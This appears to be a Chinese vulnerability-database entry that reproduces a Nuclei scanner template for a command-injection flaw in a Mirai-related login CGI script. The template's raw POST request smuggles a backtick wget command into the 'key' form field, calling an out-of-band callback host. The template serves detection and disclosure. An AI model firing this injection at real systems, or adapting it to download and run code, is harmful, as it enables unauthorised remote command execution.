mirai-unknown-rce: Mirai - Remote Command Injection

日期: 2025-08-01 | 影响软件: Mirai | POC: 已公开

漏洞描述

Mirai is susceptible to an unknown exploit that targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection vulnerability.

PoC代码[已公开]

id: mirai-unknown-rce

info:
  name: Mirai - Remote Command Injection
  author: gy741
  severity: critical
  description: |
    Mirai is susceptible to an unknown exploit that targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection vulnerability.
  reference:
    - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: mirai,rce,oast,vuln

http:
  - raw:
      - |
        POST /cgi-bin/login.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        key=';`wget http://{{interactsh-url}}`;#

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100f375bff2c3210b0091ae0b07284e744ceeff27d648258db049fdc2407317e0d10220198c59b3963f7f76ac4f56f5952a9d316ab9ffd750d5d5364eb58dd24fbed232:922c64590222798bb761d5b6d8e72950

相关漏洞推荐